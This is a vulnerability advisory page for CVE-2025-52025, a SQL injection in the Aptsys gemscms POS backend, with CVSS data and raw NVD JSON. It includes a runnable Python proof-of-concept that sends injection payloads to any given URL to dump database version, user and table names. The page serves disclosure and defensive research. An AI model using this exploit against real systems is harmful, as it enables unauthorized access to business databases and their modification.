Security Vulnerability Report
CVE-2025-52025 CVSS 9.4 CRITICAL

CVE-2025-52025

Published: 2026-01-23 21:15:51
Last Modified: 2026-02-11 19:24:10

Description

A SQL injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend through 2025-05-28. The vulnerability arises because user input is inserted directly into a dynamically built SQL query without proper sanitization or parameterization. An attacker can inject and execute arbitrary SQL code by submitting crafted input in the id parameter, leading to unauthorized data access or modification.

CVSS Details

CVSS Score: 9.4
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:* - VULNERABLE
Aptsys gemscms POS Platform <= 2025-05-28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-52025 SQL Injection PoC
# Target: Aptsys gemscms POS Platform GetServiceByRestaurantID endpoint


def exploit_sqli(target_url, payload):
    """
    Send SQL injection payload to the vulnerable endpoint
    """
    params = {'id': payload}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"


def test_basic_sqli(target_url):
    """
    Test basic SQL injection with error-based technique
    """
    # Basic injection to trigger SQL error and confirm vulnerability
    payload = "1' OR '1'='1"
    print(f"[*] Testing basic SQL injection...")
    print(f"[*] Payload: {payload}")
    result = exploit_sqli(target_url, payload)
    print(f"[+] Response length: {len(result)}")
    return result


def extract_database_info(target_url):
    """
    Extract database version and name using UNION-based injection
    """
    # Payload to extract database version
    payload = "1' UNION SELECT NULL,version(),user(),database()-- -"
    print(f"[*] Extracting database information...")
    result = exploit_sqli(target_url, payload)
    print(f"[+] Database info: {result[:500]}")
    return result


def extract_tables(target_url):
    """
    Extract table names from database
    """
    # Payload to list all tables
    payload = "1' UNION SELECT NULL,table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
    print(f"[*] Extracting table names...")
    result = exploit_sqli(target_url, payload)
    print(f"[+] Tables found: {result[:500]}")
    return result


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-52025_poc.py <target_url>")
        print("Example: python cve-2025-52025_poc.py http://target.com/api/GetServiceByRestaurantID")
        sys.exit(1)

    target_url = sys.argv[1]
    print(f"[*] Target: {target_url}")
    print(f"[*] CVE-2025-52025 SQL Injection PoC")
    print("=" * 50)

    # Test vulnerability
    test_basic_sqli(target_url)
    print("=" * 50)

    # Extract database information
    extract_database_info(target_url)
    print("=" * 50)

    # Extract tables
    extract_tables(target_url)


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52025", "sourceIdentifier": "[email protected]", "published": "2026-01-23T21:15:50.710", "lastModified": "2026-02-11T19:24:10.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend thru 2025-05-28. The vulnerability arises because user input is directly inserted into a dynamic SQL query syntax without proper sanitization or parameterization. This allows an attacker to inject and execute arbitrary SQL code by submitting crafted input in the id parameter, leading to unauthorized data access or modification."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL existe en el endpoint GetServiceByRestaurantID del backend de la plataforma POS Aptsys gemscms hasta el 28-05-2025. La vulnerabilidad surge porque la entrada del usuario se inserta directamente en una sintaxis de consulta SQL dinámica sin una sanitización o parametrización adecuadas. Esto permite a un atacante inyectar y ejecutar código SQL arbitrario al enviar una entrada manipulada en el parámetro id, lo que lleva a un acceso o modificación de datos no autorizados."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-05-28", "matchCriteriaId": "1F83E13A-9AF7-4E42-9849-9D9684967078"}]}]}], "references": [{"url": "http://aptsys.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39", "source": "[email protected]", "tags": ["Third Party Advisory", "Mitigation"]}]}}